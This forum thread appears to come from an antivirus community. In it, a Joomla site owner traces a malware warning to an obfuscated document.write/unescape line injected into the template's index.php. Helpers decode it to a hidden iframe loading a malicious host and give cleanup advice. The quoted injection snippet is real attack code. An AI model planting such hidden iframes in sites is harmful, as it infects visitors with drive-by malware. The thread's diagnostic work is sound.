JS:ScriptPE-inf [Trj] on my website

[M3rl3n]

The only reference that I have seen regarding this Trojan Horse is when it infects a person's personal computer. My case is different. I have a personal (well, semi - professional) website hxxp://www.briodanphoto.com and whenever I connect to the website, I get a warning saying that "hXXp://www.briodanphoto.com/\{gzip} contains a sample of JS:ScriptPE-inf [trj]!" I have connected to the website from work, and many of my friends have connected to the website without this warning popping up. I saw the reference to the favicon and I deleted that from the website, but the warning keeps coming up.  I am running Joomla on the website, and if my website were truely hosting a trojan horse, I'm sure that my hosting company would have eradicated it for me.

Any thoughts? I'd like to be able to view my website again.

Thanks.

[CharleyO]

***

When I visited your site, I got the "On-Access Scanner" message shown in the image below. (click it to enlarge)

I could not see the problem in the source but perhaps DavidR or someone else more adept can spot it.


***

[Lisandro]

Generally, avast detection is accurate in these cases.
Isn't it an encrypted/obfuscated script or iframe?
Wasn't the site hacked?

[M3rl3n]

Other than the different type of message that CharlyO got about the viagra link, which makes me think that someone may have thrown in a PHP script on me, the content of the site remains unchanged. So it was not "hacked" per se.   

Tonight when I get home I will try to find that php code and get rid of it.

What is interesting is that last night as I typed my message, I left the website and Avast! warning up, and eventually I saw the front page of my site, but of course as soon as I try to get rid of the Avast! warning to see the site, the site goes away because the connection was interupted.

Thanks for all the help. 

[kubecj]

This is at the very beginning of the page:
document.write( unescape( '%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%76%69%61%67%72%61%31%2E%61%74%68%2E%63%....

which means
iframe src="hXXp://viagra1.ath.cx/15/js_go_f1.php" style="display:none"

So avast! is right (again).

[DavidR]

kubecj, how do you interpret the obfuscated text ?

I did try a search to find a tool that would interpret this but I guess my search term wasn't good.

[polonus]

Hi DavidR,

Here they describe a way to do it using Spidermonkey for de-obfuscation or redux:
http://isc.sans.org/diary.html?storyid=4724
Did you mean this? http://www.gosu.pl/JsDecoder/
Interesting tool: http://securitylabs.websense.com/content/Blogs/3198.aspx

polonus

[DavidR]

Well is is a Javascript unescape decoder that I was trying to find, and I did find a site where I could copy the code into and have it decoded, http://www.felgall.com/javamet6.htm.

But I was hoping for an off-line tool, similar to what is performed on that site.

[M3rl3n]

Ok... Thanks for the info.  I am a noob to Joomla, but I do believe that I should be able to get into the code, figure out the offending lines of code and get rid of them. If any of you have an idea as to an easy way to do that, I would appreciate it.

Thanks Again.   

[M3rl3n]

I GOT IT!!!   

Thanks All.

For those with Joomla on your websites. If this situation happens to you, it is in the index.php of your active (default) template folder. Find the line as mentioned above and delete it, re-saving your index.php file back to the correct directory on the host.

Easy way to test for this...  can't believe I didn't think of it...  switch templates in administrator and reload your website on another browser window..  if it comes up without an Avast! warning, then there you go. 

Thanks Again!!

[DavidR]

Now what you have to do is try and prevent a recurrence.

Change your passwords for uploads/modification, etc. to one that is stronger. These attacks are also associated with old versions of php software which is vulnerable, so you have to ensure that it is up to date too.

[kubecj]

Regarding unescaping - we have our internal tools written, don't know if there is any stuff 'out there'.

[DavidR]

Thanks, looks like I will have to stick with that web site I found and a copy and paste job to see what is hidden.

Unless of course one of those unescape tools happens to turn up in my inbox

[M3rl3n]

I did some checking.  I was hacked. What happened is: I did add myself as admin with a couple of different names, and much stronger passwords, but I had left the default "admin" login active (although how they got through that password is interesting...  it was a tough one). So any way...  the default admin account is now gone.

Thanks again all!! 

[DavidR]

The passwords that I referred to are mainly those used to modify the site, e.g. upload the files or modify files on-line, etc.

Since you feel that it originated from the default template index.html, that could have been infected by other malware without needing to hack any windows user passwords.

If you haven't already got this software (freeware), download, install, update and run it and report the findings (it should product a log file).

• 1. SUPERantispyware On-Demand only in free version.
• 2. MalwareBytes Anti-Malware, On-Demand only in free version http://download.bleepingcomputer.com/malwarebytes/mbam-setup.exe, right click on the link and select Save As or Save File (As depending on your browser), save it to a location where you can find it easily later.